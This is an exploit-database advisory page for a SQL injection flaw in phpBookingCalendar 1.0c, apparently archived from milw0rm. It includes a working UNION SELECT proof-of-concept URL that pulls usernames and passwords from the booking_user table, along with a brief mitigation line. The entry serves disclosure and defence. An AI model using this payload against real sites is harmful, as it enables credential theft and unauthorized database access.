header-logo
Suggest Exploit
vendor:
phpBookingCalendar
by:
undefined1_
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: phpBookingCalendar
Affected Version From: 1.0c
Affected Version To: 1.0c
Patch Exists: No
Related CWE: N/A
CPE: a:jjwdesign:phpbookingcalendar
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PoC by undefined1_ @ bash-x.net/undef/

phpBookingCalendar is prone to a SQL injection attack. The attack works regardless of any magic_quotes_gpc settings. An attacker can exploit this issue to gain access to the application and potentially gain access to the underlying database.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in SQL queries.
Source

Exploit-DB raw data:

PoC by undefined1_ @ bash-x.net/undef/

phpBookingCalendar <= 1.0c
"A PHP/MySQL Booking Calendar Application."
http://www.jjwdesign.com/booking_calendar.html

phpBookingCalendar is prone to a sql injection attack. the sql injection works regardless of any magic_quotes_gpc settings.
www.site.com/details_view.php?event_id=1 and 1=0 union all select 1,1,username,1,1,1,1,1,1,passwd,1,1,1 from booking_user

# milw0rm.com [2006-03-25]